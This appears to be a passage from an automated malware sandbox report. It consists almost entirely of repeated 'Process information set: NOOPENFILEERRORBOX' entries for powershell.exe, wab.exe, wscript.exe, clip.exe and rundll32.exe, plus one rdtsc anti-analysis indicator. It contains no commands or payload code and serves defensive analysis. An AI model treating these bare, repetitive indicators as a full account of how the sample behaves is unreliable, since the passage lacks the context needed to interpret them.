            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 25_2_21FB096E rdtsc 25_2_21FB096E
